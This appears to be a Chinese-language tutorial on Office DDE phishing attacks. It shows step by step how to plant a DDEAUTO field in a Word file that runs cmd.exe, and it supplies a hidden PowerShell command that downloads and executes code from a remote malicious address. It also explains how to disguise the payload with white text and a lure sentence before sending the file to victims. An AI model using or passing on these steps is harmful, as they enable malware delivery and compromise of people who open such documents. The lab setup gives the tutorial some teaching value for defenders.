Office钓鱼攻击之DDE

通过Windows的office，可以实施许多钓鱼攻击，这里对其中的DDE恶意程序进行钓鱼攻击，通过代码调用受害者本地程序。

最终实现效果如下：

实现效果

环境

文中使用的环境如下（可采用其他版本的系统和office）：
攻击机：

• Windows 10
• Microsoft Office 2016
  靶机：
• Windows 10
• Microsoft Office 2016

相关知识

• 钓鱼攻击：钓鱼式攻击是指企图从电子通讯中，通过伪装成信誉卓著的法人媒体以获得如用户名、密码和信用卡明细等个人敏感信息的犯罪诈骗过程。
• DDE：Microsoft 的动态数据交换 (DDE) 是一种旨在允许在 MS Office 应用程序之间传输数据的协议。它在共享数据的应用程序之间发送消息并使用共享内存在应用程序之间交换数据。 应用程序可以使用 DDE 协议进行一次性数据传输和连续交换，其中应用程序在新数据可用时相互发送更新。

钓鱼文件准备

新建一个Word文件，打开，依次点击插入->文档部件->域：

插入域
在弹出的对话框中点击确定：
点击确定
可以看到如下所示界面，显示!异常的公式结尾：
插入之后
右键单击，选择切换域代码：
右键单击
变成如图所示的样子：
切换域代码
删掉= \* MERGEFORMAT，输入代码：

DDEAUTO c:\\windows\\system32\\cmd.exe "/k calc.exe" 

输入代码

其中的代码可以换成更加复杂的语句，例如：

DDEAUTO  "C:\\Programs\\Microsoft\\Office\\MSWord\\..\\..\\..\\..\\..\\Windows\\system32\\cmd.exe /c 
pOWeRShELl.exe  -NoP -W Hidden IEX(nEw-oBjECt sYstEM.nEt.wEBcLIeNt).dOWnLoADsTRiNg('http://远程恶意代码文件地址'); 

该语句将从远程下载恶意代码，并使用powershell执行。
然后保存即可（为了钓鱼效果，可在该行代码前添加诱导性语句，将该行文字颜色改成白色以掩盖痕迹）。

攻击实施

将文件发给受害者，当受害者在靶机打开文件时，出现弹窗警告：

弹窗

选择是，接着出现下一个弹窗：

下一个弹窗
选择是，就可以看到本地计算器程序被唤起，恶意代码执行成功：
执行成功

参考链接

• T1173: Phishing - DDE
• Malware Embedded in Microsoft Office Documents | DDE Exploit (MACROLESS)
• 使用Office进行DDE攻击